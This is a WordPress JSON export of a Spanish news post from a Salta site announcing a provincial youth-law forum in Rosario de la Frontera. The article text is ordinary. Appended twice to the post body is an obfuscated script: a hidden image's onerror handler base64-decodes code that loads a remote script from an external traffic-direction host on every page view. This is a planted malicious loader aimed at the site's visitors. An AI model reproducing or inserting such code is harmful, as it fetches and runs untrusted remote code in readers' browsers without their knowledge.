{"id":3940,"date":"2024-04-17T10:15:33","date_gmt":"2024-04-17T13:15:33","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3940"},"modified":"2025-08-13T23:56:56","modified_gmt":"2025-08-14T02:56:56","slug":"en-rosario-de-la-frontera-se-realizara-el-primer-foro-hacia-una-ley-provincial-de-juventudes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3940","title":{"rendered":"En Rosario de la Frontera se realizar\u00e1 el primer foro \u00abHacia una Ley Provincial de Juventudes\u00bb"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-843b0a1006b647c5ea69847fe5826572\" style=\"background-color:#8e0643\"><em>El jueves 18 y el viernes 19, Rosario de la Frontera recibir\u00e1 a las juventudes de distintos puntos de la provincia para desarrollar un encuentro inicial que permita empezar a dar forma a una propuesta legislativa.<\/em><\/h4>\n\n\n\n<p>Este jueves 18 y viernes 19 de abril se llevar\u00e1 a cabo en el municipio de Rosario de la Frontera el Primer Foro \u00abHacia una Ley Provincial de Juventudes\u00bb, bajo el lema #SaltaJoven. El evento tendr\u00e1 lugar en el Club de Leones (calle 25 de mayo N\u00b0 1.170) y el CECaM (calle Alvarado N\u00b0 144).<\/p>\n\n\n\n<p>La actividad iniciar\u00e1 a las 9:30 con la acreditaci\u00f3n en el Club de Leones y tiene como objetivo generar un espacio de di\u00e1logo y participaci\u00f3n para las juventudes de la provincia, a fin de avanzar en la construcci\u00f3n de una propuesta que sea elevada a la Legislatura salte\u00f1a, para generar una Ley Provincial de Juventudes, que refleje sus intereses.<\/p>\n\n\n\n<p>El Foro tiene como meta principal constituirse en un espacio de debate que posibilite construir propuestas para elevar una iniciativa integral que permita garantizar el cumplimiento de los derechos de las juventudes en Salta.<\/p>\n\n\n\n<p>El mismo est\u00e1 abierto para todas las juventudes, las que adem\u00e1s podr\u00e1n participar de diversas actividades, incluyendo charlas, talleres, debates y espacios de intercambio. En ese marco se brindar\u00e1n capacitaciones para funcionarios y concejales j\u00f3venes, as\u00ed como para el p\u00fablico en general, en el CECaM (ubicado en calle Alvarado N\u00b0 144).<\/p>\n\n\n\n<p>Para integrantes de los ejecutivos y legislativos municipales, se dictar\u00e1n capacitaciones sobre el \u00abPlan Provincial contra la Discriminaci\u00f3n\u00bb, a cargo de la Secretaria de Derechos Humanos,&nbsp;<strong>Mariana Reyes<\/strong>; y \u00abDigitalizaci\u00f3n y Escenarios Futuros\u00bb, dictado por el Secretario de Modernizaci\u00f3n,&nbsp;<strong>Mart\u00edn G\u00fcemes<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11664-en-rosario-de-la-frontera-se-realizara-el-primer-foro-hacia-una-ley-provincial-de-juventudes.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11664-en-rosario-de-la-frontera-se-realizara-el-primer-foro-hacia-una-ley-provincial-de-juventudes.jpg\" alt=\"En Rosario de la Frontera se realizar\u00e1 el primer foro \" style=\"width:373px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En tanto que las capacitaciones para el p\u00fablico en general se realizar\u00e1n en el Club de Leones:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u00abFoto Producto\u00bb y \u00abCv y Carta de Presentaci\u00f3n\u00bb: a cargo del CEUNsa.<\/li>\n\n\n\n<li>\u00abMejorar ventas en aplicaciones virtuales\u00bb y \u201cCuentas Sanas\u201d: a cargo de Banco Macro.<\/li>\n\n\n\n<li>Modelo Canvas para emprendedores: a cargo del Colegio de Cs. Econ\u00f3micas.<\/li>\n<\/ul>\n\n\n\n<p><strong>Un avance en la representatividad<\/strong><\/p>\n\n\n\n<p>El Foro representa una importante iniciativa que busca dar voz a las juventudes de Salta y avanzar en la construcci\u00f3n de una ley que garantice sus derechos e intereses. Se espera que el evento sea un espacio de reflexi\u00f3n, debate y propuestas, que permita avanzar hacia una provincia m\u00e1s justa e inclusiva para todas las juventudes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-rosario-de-la-frontera-se-realizara-el-primer-foro-hacia-una-ley-provincial-de-juventudes-95115\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El jueves 18 y el viernes 19, Rosario de la Frontera recibir\u00e1 a las juventudes de distintos puntos de la provincia para desarrollar un encuentro inicial que permita empezar a dar forma a una propuesta legislativa. Este jueves 18 y viernes 19 de abril se llevar\u00e1 a cabo en el municipio de Rosario de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3941,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,16,17],"tags":[],"class_list":{"0":"post-3940","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-ferias-y-congresos","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3940"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3940"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3940\/revisions"}],"predecessor-version":[{"id":6800,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3940\/revisions\/6800"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3941"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3940"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3940"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3940"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}